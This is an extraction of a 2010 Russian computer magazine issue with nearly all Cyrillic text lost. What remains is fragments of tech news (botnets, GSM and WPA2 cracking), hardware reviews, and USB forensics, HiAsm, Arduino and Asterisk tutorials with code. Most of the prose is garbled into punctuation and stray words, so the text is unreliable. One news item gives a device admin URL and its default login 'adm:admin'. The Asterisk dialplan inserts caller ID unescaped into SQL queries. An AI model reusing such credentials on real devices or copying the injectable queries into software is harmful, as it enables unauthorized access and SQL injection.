
10 (141) 2010

AOL/ AOL

AOL

CALLBACK:


. 34


AOL
. 66

141

METASPLOIT FRAMEWORK
-

LINUX

SALITY.AA

VPN-

HITB

HACK IN THE BOX



. 54

INTRO


Chaos Constructions:
. ,

IT, , ,
: ,
. CC
,

.
, :

. :
, CC
, ,
-
Defcon BlackHat, , , HITB :).
nikitozz,
. .
udalite.livejournal.com
http://vkontakte.ru/club10933209
* ? 3D ,
EligoVision.
: DVD
www.xakep.ru/3dmarkers/ Windows
Linux, web- ,

.
EligoVision 3d-
www.eligovision.ru.

CONTENT
MegaNews

FERRUM
BBK
AMD
ASUS U43Jc
HD-
DDR3

PC_ZONE
HiAsm
Arduino
Callback
Easy-Hack
HITB
Metasploit Framework
AOL
X-Tools
MSF
AOL

MALWARE
][-: Sality.aa
Nod32, Avast, Avira:
Parallels
VPN
Linux,
Linux
LUKS/dm-crypt, TrueCrypt EncFS
VPN-
Python -
WTF WCF?
MSN-
Windows Communication Foundation:
IM-

SYN/ACK
AD CS?
SET
IT-
LiveDVD/LiveUSB
Certificate Services Windows Server 2008 R2 vs. Windows Server 2003

PSYCHO:
FAQ UNITED
WWW2
FAQ
8.5
web-
AOL
Arduino
Python -
HITB
nikitozz (nikitoz@real.xakep.ru)
gorl (gorlum@real.xakep.ru)
Forb (forb@real.xakep.ru)
PC_ZONE UNITS
step (step@real.xakep.ru)
, MALWARE SYN/ACK
Dr. Klouniz (alexander@real.xakep.ru)
UNIXOID PSYCHO
Andrushock (andrushock@real.xakep.ru)
xakep.ru (xa@real.xakep.ru)

/ART
(novikov.e@gameland.ru)
(svetlyh@gameland.ru)

/DVD
Step (step@real.xakep.ru)
Unix- Ant

/PUBLISHING
, 119021, , .
, . 11, . 44-45
.: +7 (495) 935-7034
: +7 (495) 780-8824
PR-

/ .: (495) 935-7034, : (495) 780-8824
GAMES & DIGITAL (goryacheva@gameland.ru)
Gameland TV (rumyantseva@gameland.ru)
(strekneva@gameland.ru)
(ashomko@gameland.ru)
(alekseeva@gameland.ru)
(korenfeld@gameland.ru)

/:
/ .: (495) 935-4034, : (495) 780-8824
(kosheleva@gameland.ru)
(goncharova@gameland.ru)
(lukicheva@gameland.ru)
: claim@gameland.ru.
.: 8 (800) 200.3.999
101000, ,
, / 652,
77-11802 14 2002 .
Lietuvas Rivas, .
100 000 .
content@gameland.ru
, , 2010
MEGANEWS

MIFRILL

MARIA.NEFEDOVA@GLC.RU

MEGANEWS

ETHERNET WI-FI

,
,
, ,
, , .
,
, .
Wi-Fi?
:
, ,
.
Netgear
Universal WiFi Internet Adapter (WNCE2001).
-
Ethernet- Wi-Fi 802.11n,

. WNCE2001

Ethernet
, Wi-Fi Protected Setup
( WPS
, ). Netgear ,
, , USB.
Netgear Push N Connect
plug-and-play.

2000 .

,
Verdana .

WIKILEAKS
, WikiLeaks
(
,
),
. ,
,
.
WikiLeaks,
. ?
, :). , , . , , (
, , , )
, , .
WikiLeaks . , ,
e-mail Dagens Nyheter, ,
. , , , .


X 10 /141/ 10

MEGANEWS



(The U.S. Copyright Office)

,
.
,
.
:
- ,
,
;
- ,
, ,
;
- DVD-,
,
, ,
;
- (DRM)
;
- , , ,
.
, Jailbreak

iPhone ,
DVD . Apple, , , ,
, ,

, Apple .
, ,
, .
,
Apple ,
( ),
.
, , ,
(
SMS, e-mail
).
,
, ,
Jailbreak

.

SMS- Android OS.


Trojan-SMS.AndroidOS.FakePlayer.

(Butterfly)
. ,
-, Mariposa,
.
,

. , ,
Butterfly ( )
$5001.300.
: ,

Butterfly-,
23- Iserdo (
).
,
. ,
, : -


, , , ,

. , ,

Iserdo, .


MEGANEWS


,
. Brazilian Banker,
, ,
,
RSAs FraudAction Research Lab ,
.
( , ,
Orkut).

Ana Maria,

. ,
,
, EIOWJE.
,
.
,

.

$88,5
427.393

,
., Blizzard
, WoW.


.

$200


-
Black Hat , ,
, .
Black Hat
, ...
Tranax Technologies
Triton . ,
,
. ,

,
. Tranax Technologies ,
Dillinger.
Dillinger

. Triton, ,
Scrooge (
). ,
Triton ( ) ,
10 .

, .

; Triton
, Tranax Technologies
. , Tranax
ATM, .

KINDLE , ,
Amazon : Kindle DX
Kindle .
: Kindle Wi-Fi Kindle 3G + Wi-Fi.
6- 600x800 . Amazon
,
50%
( 10:1 6:1),
.
, .

21%, 17%.


190x122x8 , 241
. - , - ,
4 ( ,
3.500 ), 20%.
:
Kindle PDF WebKit.
,
,
$139 Wi-Fi $189 3G + Wi-Fi
. ,
Nook.

MEGANEWS

GSM-
,
, RC4, Skype.
,
.
Black Hat
Kraken, A5/1,
GSM-, AirProbe,
SMS. ,
A5/1 ,
, . , Kraken ,
, SMS
, 30 .
Kraken
1,7 ,
( , ).
:

GSM-
-; ,
Wi-Fi-

Wi-Fi. Wi-Fi WPA
, , GSM .
, Kraken, AirProbe, , ,
.
, , ,
,
.
, , , ,
, ,
,
- ( Wi-Fi- ). ,
-

Kraken
Airprobe. , , , ,
. ,
Defcon
( $1.500)
GSM-.
, ,

:
- AT&T,

.

TOSHIBA
Toshiba
.

Wipe (, ). Wipe ,
,

,
.

Toshiba (Self-Encrypting Drive, SED),


. ?
: HDD , - ,
, , ,
.
, ,
HDD .

BitDefender , 75%
.

PS3
psx-scene.com
ozmodchips.com , PlayStation 3 -
. PS Jailbreak, USB-,
, .
PSX Scene ( ), , debug- PS3.
, ,
PS Jailbreak. , psjailbreak.com,
, FAT- SLIM-
. : $130 .
, , , .
Sony , ,
, , ,
PS3 . !
:).


PLAY FAST,
LEVEL UP

DVD
,

PlayFast.


. ,
,

. ,
,
. ,
. ,
, . -
Digital Solutions
.
. - ,
Starcraft .
:
. ?
, ,
. , .
torrent, ( ). , 5-10%, ,
Starcraft II .
:).
- . ,
, .
-
Apple.TV, :
HD- .
: ,
.
Steam Xbox Live Marketplace, , ,
,
.
: 20-30 ,
.
,
.
, , 8 . (
8-10 ), .

, ....
Digital Solutions . ,
PlayFast (www.playfast.ru),
. ,
, .
.
, ,
. : - PlayFast , ,
. ,
.
PlayFast . ,
, .
, ,
. : 20-30
, .
. , , ,
.
:
, , .
.
, . ,
. ? : , .


MEGANEWS

BLU-RAY
, , ,
-.
. 68240
,

CD, DVD,
Blu-ray ..

. , 27

200 ,
, , 45 .
.

- :

25 , 50 . 26 /,
36 /.
120 ,
1,2 ,
. ? ,
Blu-Ray.
Blu-Ray ,
, ,

60 .


LOGITECH


,

.
,
, .
Logitech Wireless Illuminated Keyboard K800
Logitech , .

(
) ,

.
Logitech ,
10 (,

micro-USB). Logitech
Unifying, Logitech
Advanced 2.4 GHz .
PerfectStroke,
, Incurve Keys .
,
100 .

19 54 Virus

Bulletin, VB100.
Kingsoft Bkis BKAV.

CHROME OS TABLET
Chrome OS. downloadsquad.com, ,
, ,
, HTC
Chrome OS Tablet.
, HTC
Nexus One, ,
, .
DownloadSquad

,


Verizon 26 ! DownloadSquad
,
, ,

,
.
, : Google Verizon .
Engadget
DownloadSquad

, . , Chrome OS
2011
.

ANDROID- LG

ANDROID

LG
Android 1.6
LG Optimus (GT540). -
: !
- 3.0 Android ,
.
:
8.990 .
,
Android-
:).
Qualcomm
MSM7227 600 , 200
TFT- 3.0 (320x480).
microUSB, Wi-Fi,
Bluetooth 2.1+EDR (A2DP), FM- microSD (2
, 32 ).

: 3
,
. Android
, , , .


(Justin Case)

Android Licensing Service,

Android-
.
Licensing Service


Google ,

.

- ,

,

( ).
,
,

.


www.androidpolice.com , Google
.

: Intel
McAfee ,
, $7,68 .

WPA2
, AirTight Networks, Wi-Fi-
WPA2. , Hole 196, , IEEE802.11
(Revision, 2007). : WPA2-
: Pairwise Transient Key (PTK), ,
, Group Temporal Key (GTK),

-. , PTK
, GTK . , Hole 196,
, GTK
196 IEEE 802.11! -,
. Man-in-the-middle , Wi-Fi-,
, ,
.
, , MAC-. , ,
,
, WPA2 .
: www.airtightnetworks.com/wpa2-hole196

MEGANEWS

CARDERPLANET
carderplanet.com (CC
2004 ),

. 27-
,
.
, BadB,
. , BadB
CC
.

, .
.
. ,
, BadB

,
.
, ,

.

10 250
,
2 ,
250 .

WI-FI-
Parrot
AR.Drone, iPhone,
. ,
, .
, www.rabbit-hole.org, :). ,

Wi-Fi-! -23,
Via Epia Pico ITX PC (500 Via C7, 1 RAM Backtrack 4 )
ArduPilot.

, PPP over SSH .
ArduStation, . Edge/3G
, ,
. WASP (Wi-Fi Aerial Surveillance Platform) 30-45 , ,
, 7 . , ,
, GPS-, ,

, ,
. ?
?. , Google
Microdrones.

. Google Earth Google Maps.

Harris Interactive , , ,
49% 52%
.

IPAD
iPad
Shenzhen Paoluy Silicone Technology. BL-BKB76,
,
, (Bluetooth) QWERTY- iPad .
.
Apple
-, 4-4,5
.
100 ,
90 .
, $90.



, , ,
, .

,

, rsnet.ru. ,
,
, : https://[ip]/cgi-bin/main.scm,
adm:admin. , , ,
-
() - ,
, SMS . , ,
.
,
, , , . ,
, ,

(
).

.

Avast $100 .
Summit Partners.
- freemium.


FERRUM

-
ASUS U43Jc

, ASUS
Bamboo,
:
, ,
, .

ASUS U43Jc .


:
!
.
,
: -


.
: ASUS
,
, ,
.
ASUS ,

:
,
!
.
, : 14
.

: Intel Core i7-620M 2,66


: Mobile Intel HM55 Express Chipset
: 4 DDR3 1066 SDRAM
: 14", , 16:9, 1366x768, LED-
: NVIDIA GeForce 310M, 1 DDR3 VRAM
: 640, 5400 /
: 5--1 (SD,MMC,MS,MS-Pro,XD); Mic; Headphone; VGA/Mini D-sub; USB 3.0; 2xUSB 2.0; RJ45; HDMI
: 34.4 x 24.1 x 2.20~3.18 , 2.14
DVD Super Multi


ASUS Crosslink , - .

DVD- ,

. USB, ( Windows MAC)
4 .

USB- ASUS CineVibe


,
. ,
, , . ,
CS Source ,
:).

ASUS VECTOR BACKPACK


. /
, , :
.
,
, . 16 .

, : LED- 1366x768 , HD-


.
, .
.

ASUS . , ,

. , ,

, .
, .

ASUS U43Jc :
Intel Core i7-620M

2,66 Intel Turbo Boost, 3.33 , ,


, .
NVIDIA GeForce 310M 1 DDR3 VRAM. ,
Intel Core i5 GMA
HD.
NVIDIA
Optimus, ,
.
, HDMI-, USB, USB 3.0.
ASUS Super Hybrid Engine (SHE), ,
.
,
: , ASUS U43Jc
10.5 !

U43Jc ASUS Bamboo Series :


U33Jc ( 13.3) U53Jc (15.6).
: ,
U33Jc .
, ASUS U43Jc .
: , 14.
,
.
. , : 10.5 ASUS.

ASUS
trendclub.ru. Trend Club
, .
Trend Club , , . Trend
Club Intel ASUS
.

Intel, , , ,
.
Intel Web- Intel http://www.intel.ru, http://blogs.intel.com.
Intel www.intel.ru/rating.


FERRUM

BBK
, , , , ? -
, .


HDTV Full HD.
1280720 19201080 -
. -
HD SD,
, : !
?! , ,
HD.
, ,
-
,
HDTV ,
4:3 .
,
.
,
HDTV-
BD- ,
,

, .
, ,
Blu-ray
.
, - ,
, , ,
,
, , .
-
.
,
.
,
HD- BBK,

.


MP050S
, ,
.
, MP050S -
,
, USB- ( FAT, FAT32 NTFS)
. ,
,
.
MP050S ,
USB-, ,
.
- , MP050S
, MKV
(Matroska) MOV (H.264).

2890 .


:
: HDMI 1.3, , , , USB 2.0,
SD/MMC/MS
:
- MPEG-1/2/4, MPEG-1/2 PS (M2P, MPG), MPEG-2, VOB, AVI, ASF,
WMV, MKV (Matroska), MOV (H.264), MP4
- AAC, M4A, MPEG audio (MP1, MP2, MPA), WAV, WMA
- JPEG HD, JPEG, BMP, PNG
- ISO, IFO
: 1080p
HDD :
:
: 121x26x101


MP060S

MP070S

MP060S
.
HDTV ,
-
(BitTorrent HTTP).
, , ,
.
SATA- (
),
HD-.
, , , , . ,
, MP060S
- .

,
.
MP070S .
, MP070S, MP060S
, -
.
, ,
-
SATA 3.5". , 6080 , , ,
1.5 .

4690 .

3600 .

: LAN (Ethernet) 10/100 /


: HDMI 1.3, , , , , , USB 2.0, MiniUSB, SD/MMC/MS, eSATA Host
:
- MPEG-1/2/4, MPEG-1/2 PS (M2P, MPG), MPEG-2, VOB, AVI, ASF,
WMV, MKV (Matroska), MOV (H.264), MP4
- AAC, M4A, MPEG audio (MP1, MP2, MPA), WAV, WMA
- JPEG HD, JPEG, BMP, PNG
- ISO, IFO
: 1080p
HDD :
:
: 134x195x125

: LAN (Ethernet) 10/100 /


: HDMI 1.3, , , , , , USB 2.0 2, MiniUSB, SD/MMC/MS, SATA Host
:
- MPEG-1/2/4, MPEG-1/2 PS (M2P, MPG), MPEG-2, VOB, AVI, ASF,
WMV, MKV (Matroska), MOV (H.264), MP4
- AC3 (Dolby Digital), DTS, WMA, WMA Pro, AAC, MP1, MP2, LPCM,
AAC, M4A, MPEG audio (MP1, MP2, MPA), WAV, WMA
- JPEG HD, JPEG, BMP, PNG
- ISO, IFO
: 1080p
HDD : ( 3.5
SATA)
:
: 210x51x162


FERRUM

: ASUS Crosshair IV Formula


, : 2700, Athlon II X4 635
: MSI Radeon HD 4850
, : 700, FSP Blue Storm
: Windows 7 32-bit

AMD
DDR3

, , .
,
, , .
AMD, . ,
, ,
.
.

, AMD, , ,
, ,
. ,
, , 1800 .
FSB, . ,
,
,
, ,
( ) . , ,
, , , , , , . .

, ,
, , , .

, 1800
.
2000 ,
, , ,
, .

. , ,
,
. ,
(9-9-9-24) (1,65 ).

SuperPI , ,
, ,

; Everest, , , . PCMark Vantage,
,
. ,
WinRAR.


2700 .

5700 .

APACER GIANT II
DK 02GAL F9QK2
:

, : 1024
, : 1800
: 9-9-9-27
, : 1,65
:

, . Apacer,
,
,
. .
(1980 ), , ,
, .
,
: . , , .

, , ,
, - 2 ? ,
Windows XP, .
. 1800 ,
9,
2200 .
.

APACER GIANT II
DK 04GAS F1QK2
:

, : 2048
, : 2200
: 10-10-10-30
, : 1,65
:

Apacer
. - 4
Windows 7,
, . .
,
,
.

, . , AMD ,
Intel, ,
. , , ,
, .


FERRUM

7500 .

10300 .

CORSAIR DOMINATOR
GTX CMGTX2
:

, : 1024
, : 2250
: 8-8-8-24
, : 1,65
:

,
. - , , , ,
.
8-8-8-24 2250 .
, 1792 , ,
PCMark Vantage . , GTX
.

, . , , ,
.
.


KINGMAX HERCULES
FLKE85F-B8KJA FEIH
:

, : 2048
, : 2200
: 10-10-10-30
, : 1,5
:

4 , , ,
( ,
1,5 ) . , ,
AMD . , ,
Intel .

, , , . , (
7 /). , .


7000 .

13000 .

KINGSTON HYPERX
KHX2000C8D3T1K2/4GX

KINGSTON HYPERX
KHX2133C8D3T1K2/4GX

, : 2048
, : 2000
: 8-8-8-24
, : 1,65
:

Kingston, ,
, ,
,
. , , WinRAR
, . HyperX
. ,
, . , 2000 8-8-8-24 ,

, , . Kingston, ,
.

, AMD , .

, : 2048
, : 2133
: 8-8-8-24
, : 1,65
:

,
Kingston, , . , . , . ,
.
, 133
.

, AMD, 2133 , ( Kingston HyperX


KHX2000C8D3T1K2/4GX) .
,
.

Kingston HyperX KHX2000C8D3T1K2/4GX , . Apacer Giant II (DK 02GAL F9QK2) . z


FERRUM

[Benchmark charts: PCMARK, SUPERPI, WINRAR and EVEREST results for Apacer Giant II (DK 02GAL F9QK2), Apacer Giant II (DK 04GAS F1QK2), Kingston KHX 2000 C8D3T1K2/4GX, Kingston KHX 2133 C8D3T1K2/4GX, Transcend TX2000 KLU-4GK, Kingmax Hercules (FLKE85F-B8KJA FEIH) and Corsair Dominator GT CMGTx2]

PC_ZONE
Step twitter.com/stepah


,
. forensics.
#100 ][
:
, ,
,
- .
forensic
,
, , history
-,
- .
, ,
,
.
,
,
.
, - ,
.
, .

USB- -
USB-, , .
,
,
. ,
,
, .
,
- . ,
forensic,
.
Windows.
, ,
,
.
. , ,
.

,
. ,


usbHistory

.
, ,
. PnP
,
USB- USB Driver
USBSTOR.SYS.
(MountMgr.sys),

,
. ,
,
.

.
: HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR.
, -
,
. , ,
.
,
,
,
, .
. HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceClasses\{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
.
, (
), Control,

.

Windows
Forensic Analysis (Harlan Carvey),
.
, usbHistory (sourceforge.net/projects/usbhistory).
,
,
:
USB History Dump
by nabiy (c)2008
(1) --- USB Device
instanceID: 1001178901b3f6&0
ParentIdPrefix:
Driver:{4d36e967-e325-11ce-bfc1-08002be10318}\0032
Disk Stamp: 03/28/2010 18:10
Volume Stamp: 11/03/2009 17:26
(2) --- USB Flash Drive USB
Device
[..]

.

.
,
,
,
.
, .
. z

PC_ZONE
Dilma support@hiasm.com


HiAsm

, -
. ,
,
. .

- . ,
,
.
, : Basic, Pascal, C .
, () ,
,
Delphi C++.
, . ,
,
LabView, HiAsm, SoftWire .
? .

HIASM

HiAsm ,
, ,
. , -
(, , , , ..


..). ( )
(
,
). , .
,
( , ,
, ,
, ).
,
( ) .
,
Hello world!,
. , , .
: (Button)
(Message), (
)
Message ( Hello world!).
, , , HiAsm:
Make(delphi)
Add(MainForm,2953706,21,105)
{
}
Add(Button,147563,189,105)
{
Left=180
Top=110
link(onClick,5363509:doMessage,[])
}
Add(Message,5363509,238,105)
{
Message="Hello world!!!"
}

Object Pascal,
. , HiAsm
.
.

Windows, Object Pascal
FPC Delphi.
:
PocketPC C++ MS ARM Microsoft Windows Mobile;
WEB PHP JavaScript HTML;
QT C++ Windows, Linux MacOS;
VBS Basic Windows .
just for fun online- HiAsm (hion.hiasm.com), ,
.

Windows ( hiasm.com 4.4)
ab apache-tools.
-
URL , .
100 http://ya.ru
, . , .
,
.
HiAsm : ...,
Windows Windows.
.

, ,
. ,
TCP
. TCP-.

HTTP- 80, IP ya.ru 93.158.134.3.


, .
. Strings
HTTP- :
GET / HTTP/1.1
Host: ya.ru
Connection: close
< >
< >

,
. ,
.
(Hub),
,
. ,
,
HTTP/1.1 200 OK.
,
:
onClick ( );
doEvent1 ;
, , onEvent1 onEvent2;
onEvent1,
doOpen TCP-.
ya.ru 80 ;
, ,
, onEvent2;
, , doSend TCP.
Data, .
Text
, , , , , ;
, , TCP-
onRead;
onRead doAdd ,
.
, , .

, . ,
Data
, .
onClick , -


PC_ZONE

( 1)
, , doSend.

, ,
- .
, ,
.

.
.
, , .
(onClick doStart onStart
doEvent1), doStop onDisconnect
TCP-. ,
,
onDisconnect, . ( ,
doStart doStop)
onStop.
, , ,
(
). ,
. , .
,
100 .
onDisconnect
,
. , . ,
,
, . onDisconnect,
100. 100,
,
. ,
. Op1
Result,
, , onDisconnect.
: x = x + 1.

onResult, doCompare
. 100,
:



( 2)

if(x < 100)


[ doEvent1 ]
else
[ doStop ]

, , doClear
. doClear
onDisconnect
,
.
,
,
onStart doEvent1 .

, ,
.
, (
onDisconnect, )


,
.
:
(Hub) .
-(DoData)
.
(Memory)
.
:
(Math) .
(If_else)
.
(For)
, .
-> (Timer)
.
-> (Debug) ,
.



( 3)
INFO
HiAsm

.
-
. ,
, .

, . , HiAsm ( , ,
) - . HiAsm
, , ,

. :).
(,

), HiAsm
,
. , ,
( ) , .
, ,
. ,

, ,
, ,
, .
,

.
-
, 10
, .

, , ,

. , , ,

.
,
, , ,
. - ,

, . ,
,
, ,
,
.

Windows ( )
,
.

HiAsm
. , ,
, ,
, .
, ,
HiAsm.
,
(
, ..),
(, , )

- .
, - . : ,
500-1000 ,
.
,
: , ,
HiAsm 7000 .z

info
HiAsm (
)
,
,
dilma ( ,
), nesco ( ), iarspider
( ), nic
( )
.

,
,


.

HTTP://WWW
links
HiAsm:
hi-asm.blogspot.com

:
my-hiasm.net.ru
HiAsm online:
hion.hiasm.co


PC_ZONE
noonv13@gmail.com

-


Arduino

,
,
. , , - , ,
. ,
, Arduino .

.
, . , - ,
, , , - . ,
,
. Arduino. , ,
. -,

. ?

ARDUINO?

, Arduino, /
Wiring. , C++,
.
Arduino ATmega328 ATmega168



.
5 16
, (). .
. (), , , ( ) Arduino IDE . ?, . : ()
.
( AVR) ( ),
(7 LPT- ) (
). ,
- (, , ).
: Arduino .
USB-. ,
Arduino !
Arduino 9-12
(

$5
Arduino

Arduino -

, ), USB- .
, ,
USB- A-B,
.

.
. Arduino /
. 14 /
. ,
, .. - . , Arduino 0
1.
5 . , .

. , - , . . Arduino
Arduino IDE, Wiring ( , C++),
AVR WinAVR.
C.
Arduino , .
, ,
. Arduino
Arduino (www.arduino.cc). , Arduino
. Arduino
, - (
duino): , Freeduino, Seeduino CraftDuino. Arduino
, , Linuxcenter (www.linuxcenter.ru/shop/embedded/arduino) , , -
- (, www.sparkfun.com). $30.

, Arduino
.

, . , , /
.. , Arduino
- (, ),
. , Ethernet- Arduino

( ). GSM-
, GPS- GPS-,
Wi-Fi- ..

. , Arduino

, . - Arduino!
Twitter? ? ! , ,
, ,
Arduino.
, .

, .
- Arduino. .
.
. ,
Arduino, , (
). ? , , , ( 40
).
.
, . , Arduino
( ).
L293D (
Motor- , ).
.
.
-,
. , ,
, Arduino . ,
( ) ,
SG-90 USB.
-
$5 .

, , ,
, .
- .

.
, ,
( ).
( ),
, - ,
. :


PC_ZONE

OpenCV -

(/),
+5 (),
(//).
, .
,
.
.
, .
, Arduino IDE
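Servo (www.arduino.cc/en/Reference/Servo). , 0 180 :
#include <Servo.h>

Servo myservo;  // servo object used to control the servo
                // (up to 8 servo objects can be created)
int pos = 0;    // current servo position in degrees

void setup()
{
  myservo.attach(9);  // the servo signal wire is on pin 9
}

void loop()
{
  // sweep from 0 to 180 degrees in steps of 1 degree
  for (pos = 0; pos < 180; pos += 1)
  {
    myservo.write(pos);  // move the servo to position pos
    delay(15);           // wait 15 ms for the servo to get there
  }
  // sweep back from 180 to 0 degrees
  for (pos = 180; pos >= 1; pos -= 1)
  {
    myservo.write(pos);
    delay(15);
  }
}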

ARDUINO

, , . -,
() .
. , ,



. . Arduino
( CraftDuino) , .
,
. :).
, : Arduino,
.
. Arduino . ,
Servo (
Arduino IDE).
,
Firmata, , Servo,
Arduino IDE. Firmata ,

Arduino . Arduino,
:
#include <Firmata.h>
#include <Servo.h>

Servo servo7;  // Servo objects for the two servos
Servo servo8;

// Callback that Firmata calls for every incoming analog message
void analogWriteCallback(byte pin, int value)
{
  if (pin == 7)
    servo7.write(value);  // turn the servo to the angle given in value
  if (pin == 8)
    servo8.write(value);
}

void setup()
{
  Firmata.setFirmwareVersion(0, 2);
  // register the callback for analog messages
  Firmata.attach(ANALOG_MESSAGE, analogWriteCallback);
  servo7.attach(7);  // the servos are connected to pins 7 and 8
  servo8.attach(8);
  Firmata.begin(9600);  // start Firmata on the serial port at 9600 baud
}

void loop()
{
  // process incoming messages while data is available
  while (Firmata.available())
    Firmata.processInput();
}

DVD
dvd
Arduino
++
.

(robocraft.ru/files/opencv/servobot/servobot.zip).

HTTP://WWW

links


Arduino.
Arduino IDE,
Tools Board, ,
(Tools Serial Port),
.
Done compiling.
Arduino,
. , Done
uploading., !
-.

, ++.
web-cam-
,
OpenCV (sourceforge.net/projects/opencvlibrary).
,
Intel (
). , OpenCV
,
.
, .
: -
, .
, .
- ,
( 90
). rotate(),

-
OpenCV: cvWarpAffine(),
. ,
-,

:
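// A is set by myTrackbarA(); Amax is the upper limit of its range
int A = 0;
int Amax = 180;
// F and the upper limit of its range
int F = 0;
int Fmax = 180;
IplImage* dest = 0;

// trackbar callback: sends the new position to the Arduino
void myTrackbarA(int pos) {
    A = pos;
    // Firmata analog message: 0xE0 | pin, then the value as two 7-bit bytes (LSB, MSB)
    char buf[3];
    buf[0] = 0xE0 | 7;
    buf[1] = A & 0x7F;
    buf[2] = (A >> 7) & 0x7F;
    sg.Send(buf, 3);  // sg: serial port object (declared outside this fragment)
    Sleep(100);
}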


Arduino:
www.arduino.cc
:
robocraft.ru/blog/computervision
WinAVR:
sourceforge.net/projects/winavr
Arduino :
community.livejournal.com/ru_arduino

, , . .
, , . , , !
! ,
. -
.
, , , Arduino
. , ? ,
. z


PC_ZONE
Aggressor


Callback
IP-.
, , -
Skype-, Wi-Fi 3G.
,
callback, VoIP
. , , VoIP-.

callback VoIP. , ,
,
. - ,
-. - ,
.
. : ,
, .
PIN- ( )
, .
, callback.
.

-
, ,
. , ,
Asterisk. , Asterisk . , ,


. PDF- ,
(www.xakep.ru/magazine/xa/107/152/1.asp www.xakep.ru/magazine/xa/108/154/1.asp).
TrixBox, Elastix ..;
. , , . , , Asterisk . ,
Asterisk
, SIP. .
, , SIP-, , . VoIP FXO-, :
Caller ID,
. ,
. SIP-, ,
. ( )
VoIP-, .
, ,
. . .
, Asterisk VoIP-GSM , :
5000 .

SIM- SIM Dialer

MySQL
3G-, 1000 . SIM Dialer,
, ,
callback- .
, SIM- ( ).

, , Asterisk
, .
, .
/etc/asterisk/extensions.conf (
,
) , : [fromgorod].
, ,
, (IVR),
PIN-, .
310309:
[fromgorod]
exten => 310309,1,NoOp(zvonyat s nomera ${CALLERID(all)})
exten => 310309,n,NoOp(${STRFTIME(${EPOCH},,%d.%m.%Y%H:%M:%S)})
exten => 310309,n,GoToIf($["${CALLERID(number)}" = "8901234567"]?ivr,s,1)
exten => 310309,n,Answer() ;
......

NoOp Asterisk
. Caller ID ,
. ,
. exten => 310309,n,GoToIf($["${CALLERID(number)}" = "8901234567"]?ivr,s,1) , , . 8901234567,
IVR; ,
. ,
8 .
callback- ,
. , 50? . Asterisk
MySQL, CDR.

Asterisk, CDR.
callback. mysql -u asterisk -p asterisk, ,
.
(, PIN-, callback, )
:
CREATE TABLE `callback` (
`phone` varchar(80) NOT NULL default '',
`pin` int(11) NOT NULL default '4321',
`callback` int(11) NOT NULL default '0',
`user` varchar(255) NOT NULL default ''
);
INSERT INTO callback(phone, pin, user) values('8901234567', '2602', 'Aggressor');

, , Asterisk ? , [fromgorod]:
exten => 310309,1,NoOp(zvonyat s nomera ${CALLERID(all)})
exten => 310309,n,NoOp(${STRFTIME(${EPOCH},,%d.%m.%Y%H:%M:%S)})
exten => 310309,n,MYSQL(Connect connid localhost asterisk asterisk asterisk)
exten => 310309,n,MYSQL(Query resultid ${connid} select pin, callback from callback where phone=${CALLERID(number)})
exten => 310309,n,MYSQL(Fetch fetchid ${resultid} pin callback)
exten => 310309,n,NoOp(pin -> ${pin} callback# -> ${callback})
exten => 310309,n,MYSQL(Clear ${resultid})
exten => 310309,n,MYSQL(Disconnect ${connid})
exten => 310309,n,GoToIf($["${pin}" != ""]?ivr-pass,s,1)
exten => 310309,n,Answer() ;

, , :
, SQL-
.
GoToIf($["${pin}" != ""]?ivr-pass,s,1). , pin ,
ivr-pass.

IVR

, .
? , PIN, , .
, ,


PC_ZONE

CLI ,

IVR. , , ivr-pass:
[ivr-pass]
exten => s,1,Background(WelcomePass) ;
exten => s,n,WaitExten(10)
exten => _XXXX,1,GoToIf($["${EXTEN}" = "${pin}"]?ivr,s,1)
exten => _XXXX,n,Hangup
exten => t,1,Hangup
exten => i,1,Hangup

GSM-
SIP, .
, VoIP-GSM ,
3G USB- HUAWEI 1550, .
callback, SMS.
, , ,
MICRO-BOX HUAWEI MODEM UNLOCKER.
.
2.6.32 .
Asterisk (www.makhutov.org/svn/chan_datacard), 3G-.
, chan_datacard.so /usr/lib/asterisk/modules. ? . ./trunk/etc/datacard.conf /etc/asterisk.
[datacard0] [datacard1] , . , ,
:
[datacard0]
audio=/dev/ttyUSB1
data=/dev/ttyUSB2
context=datacard-incoming
group=1
rxgain=3
txgain=3
,
. / , SMS:
CLI>datacardsms datacard0 89000000000 Hello!
CLI>datacardussd datacard0 *102#
[datacard0] Got USSD response: ' 155.49 .
+=. ? + 5050 3'



call-

WelcomePass ( /var/lib/asterisk/sounds/ru).
10 .
, : exten => t,1,Hangup. PIN
, , : exten =>
i,1,Hangup. , , Hangup
PIN, . ,
, PIN-,
ivr.
[ivr]
exten => s,1,Set(inum=0)
exten => s,n,Set(tnum=0)
exten => s,n,Background(Welcome)
exten => s,n,WaitExten(10)
exten => 1,1,GoTo(ivr-out,s,1)
exten => 2,1,GoTo(ivr-ch-pin,s,1)
exten => i,1,Playback(pbx-invalid)
exten => i,n,Set(inum=$[${inum} + 1])
exten => i,n,GotoIf($["${inum}" < "3"]?s,1)
exten => i,n,Hangup()
exten => t,1,Set(tnum=$[${tnum} + 1])
exten => t,n,GotoIf($["${tnum}" < "3"]?s,1)
exten => t,n,Hangup()

ivr inum tnum



. pbx-invalid, inum 1.
,
tnum. Welcome,
. : 1 2
PIN-:
[ivr-out]
exten => s,1,Set(inum=0)
exten => s,n,Set(tnum=0)
exten => s,n,Background(beep)
exten => s,n,WaitExten(10)
exten => _89XXXXXXXXX,1,Dial(SIP/bla1/${EXTEN})
exten => _89XXXXXXXXX,n,Hangup
exten => _8495XXXXXXX,1,Dial(SIP/bla2/${EXTEN})
exten => _8495XXXXXXX,n,Hangup
exten => _8[2-8]XXXXXXXXX,1,Dial(SIP/blabla3/${EXTEN})
exten => _8[2-8]XXXXXXXXX,n,Hangup
exten => i,1,Playback(pbx-invalid)
exten => i,n,Set(inum=$[${inum} + 1])
exten => i,n,GotoIf($["${inum}" < "3"]?s,1)
exten => i,n,Hangup()
exten => t,1,Set(tnum=$[${tnum} + 1])
exten => t,n,GotoIf($["${tnum}" < "3"]?s,1)
exten => t,n,Hangup()


[ivr-ch-pin]
exten => s,1,Background(beep)
exten => s,n,WaitExten(10)
exten => _XXXX,1,MYSQL(Connect connid localhost asterisk asterisk asterisk)
exten => _XXXX,n,MYSQL(Query resultid ${connid} update callback set `pin`=${EXTEN} where phone=${CALLERID(number)})
exten => _XXXX,n,MYSQL(Disconnect ${connid})
exten => _XXXX,n,Hangup()
exten => i,1,Hangup()
exten => t,1,Hangup()

ivr-out . ,
. : ,
